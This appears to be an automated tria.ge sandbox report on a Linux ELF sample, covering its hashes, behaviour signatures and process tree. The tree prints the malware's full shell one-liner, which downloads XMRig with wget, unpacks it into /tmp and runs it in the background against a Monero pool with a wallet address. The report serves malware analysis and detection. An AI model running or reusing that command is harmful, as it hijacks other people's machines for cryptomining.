Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
58s -
max time network
133s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
06/03/2024, 12:31
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf
-
Size
28KB
-
MD5
81959aa15f618e7f878587c3fbee558f
-
SHA1
63f4ff2f4e073f771f3360a97a91d83cb7f397a7
-
SHA256
884107422df524c5d7584f267910c4d738fa09187a6f835374038ed27c2a4fc8
-
SHA512
1cb22d5f938921717cc8ed77bb9fc3250a85e7256ae26c7503e2890d434e9bf4b559708f32cab301b482825c8ca86ce5b60b3b9b45700334537d5f12c9cc64b0
-
SSDEEP
768:Z0TF6I/0OdgyoCJSqeYCU7hWdj8qFCT5FL9GI0:ZwH8O67CCg7YdAMCTe
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself 1466 SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems tar File opened for reading /proc/sys/kernel/random/boot_id tar File opened for reading /proc/filesystems mv File opened for reading /proc/self/exe SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xmrig-6.21.1/config.json tar File opened for modification /tmp/xmrig-6.21.1-linux-x64.tar.gz wget File opened for modification /tmp/xmrig-6.21.1/xmrig tar File opened for modification /tmp/xmrig-6.21.1/SHA256SUMS tar
Processes
-
/tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf/tmp/SecuriteInfo.com.Possible_SMMODUPXA.16390.11100.elf1⤵
- Changes its process name
- Reads runtime system information
PID:1466
-
/bin/shsh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz && tar -xzf xmrig-6.21.1-linux-x64.tar.gz && mv xmrig-6.21.1 /tmp/ && rm -rf xmrig-6.21.1-linux-x64.tar.gz && cd /tmp/xmrig-6.21.1 && chmod 777 * && ./xmrig --opencl --cuda -o xmr-eu1.nanopool.org:14433 -u 49WVNTHfo5c7zfYi3METsCPW93hLJFYNKBS5GZDxSbuZA1FNJULGvkkY5y7sDozjTTMgeT3JyqLfV38TGzqMPuiGJzeHmeZ --tls --coin monero --background"1⤵PID:1469
-
/usr/bin/wgetwget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz2⤵
- Writes file to tmp directory
PID:1473
-
-
/usr/bin/tartar -xzf xmrig-6.21.1-linux-x64.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1931 -
/usr/local/sbin/gzipgzip -d3⤵PID:1932
-
-
/usr/local/bin/gzipgzip -d3⤵PID:1932
-
-
/usr/sbin/gzipgzip -d3⤵PID:1932
-
-
/usr/bin/gzipgzip -d3⤵PID:1932
-
-
-
/usr/bin/mv2⤵
- Reads runtime system information
PID:1933
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
660KB
MD59f4425baac2f1e5eada1e0023b99051c
SHA1828def9efa7455a34c59566526e639eb5da011d3
SHA256ffd2d2680728223015c76d0cd7c2fd7d960069412f5aa3ab70629a210205230a
SHA51275611a7ec51475b1d5c8c524d376900997a3002b935a00a8e618b08bd91573f4ed9cfcffb91d2e795153a5d460302d5b963730f8ec3ac396d9872d70c11c89cc
-
Filesize
150B
MD50eeaf66a6ba6b6934ffefce538342572
SHA18f28c8a7345c85b2ae78924828aa16e1b6be7b97
SHA256aa89fb25473e544be6a5cbe6a6106e220fc6cd4b935fe76bc73a19b3b6daed60
SHA5125a8e8a77e97f2b221bf1a9097a2f19a2c3c0ed376d7e2561a41c6d74203ddbe9d0482a818d17555da44088e511b3724dd41dd7cc91e3ebaadab9c176b1a7b57d
-
Filesize
2KB
MD566f38c96a4901e7b345787c447842b3e
SHA12aa9b4d1bd2edd5d81bd9725e9318edaee67531f
SHA2562b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec
SHA51271757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f
-
Filesize
7.4MB
MD55849c28ac8e6452e4f0fb6dec4cc133f
SHA1997cf47e1b5b5751e5632c5555bcdc521616becb
SHA256c39a9d5a2f6f04d285f0516d5b9f2f31fab96df2f41c21e440d19a55581ac244
SHA5128379ea31373db2452a37c713df1ecbb3bc1396c58b6450960d624e95b89cf7954547fab3a747407ffd120b4e7b9751bb2cdb95891652240e356a6143f183d6d2